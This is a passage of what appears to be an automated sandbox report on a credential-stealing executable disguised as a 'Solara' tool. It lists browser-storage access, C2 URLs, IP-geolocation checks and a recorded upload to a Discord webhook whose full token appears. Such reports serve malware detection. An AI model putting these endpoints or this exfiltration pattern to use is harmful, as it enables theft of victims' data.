                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\extJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\defJump to behavior

                        Networking

                        barindex
                        Source: Malware configuration extractorURLs: cash-spoken.gl.at.ply.gg
                        Source: Malware configuration extractorURLs: http://a1009150.xsph.ru/@==gbJBzYuFDT
                        Source: Yara matchFile source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE
                        Source: global trafficTCP traffic: 192.168.2.4:49745 -> 147.185.221.21:27573
                        Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
                        Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E586C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: global trafficDNS traffic detected: DNS query: github.com
                        Source: global trafficDNS traffic detected: DNS query: blank-curro.in
                        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: discordapp.com
                        Source: global trafficDNS traffic detected: DNS query: cash-spoken.gl.at.ply.gg
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq HTTP/1.1Host: discordapp.comAccept-Encoding: identityContent-Length: 688920User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=0e3213dce644b7bfaf68d16c9fe0b5b3
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 05 Aug 2024 12:32:06 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: B090:27A6E7:1689912:191F432:66B0C646Accept-Ranges: bytesDate: Mon, 05 Aug 2024 12:32:08 GMTVia: 1.1 varnishX-Served-By: cache-ewr18173-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1722861128.013060,VS0,VE9Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: d42a565218eb15c8bad48e7c7ffb3796b47dc347Expires: Mon, 05 Aug 2024 12:37:08 GMTSource-Age: 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 05 Aug 2024 12:32:06 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 12:32:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=cc102cbe532611efb691ee972d83bda8; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomainsx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722861158x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7l2Y0cbTqAvp9FnXw%2Fn5Qe08%2BJ3iJfctX0ftX9zN%2F9FZo7aOhzp6m9g5eW61JyzYYhpuEFYJAL9S1R5djAKmMIZnsprSWC94yVsG0NbVHdCVzs%2B9PHVF6rcm4XPJFe9i"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __sdcfduid=cc102cbe532611efb691ee972d83bda82e7f3f39958e45967b3cc47046cb9666bba02bd08ddaaa28342cb9067cb06e2d; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                        Source: Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.di
                        Source: Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: powershell.exe, 00000011.00000002.2066149183.000002697F655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft7
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                        Source: Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                        Source: Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: Built.exe, 00000003.00000003.1856705420.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E5341000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1884484741.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2047540968.000001D5E5341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                        Source: Built.exe, 00000003.00000002.2046197420.000001D5E523A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E5120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
                        Source: Built.exe, 00000003.00000002.2042918246.000001D5E4D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000011.00000002.2033751444.00000269116F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7EC000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 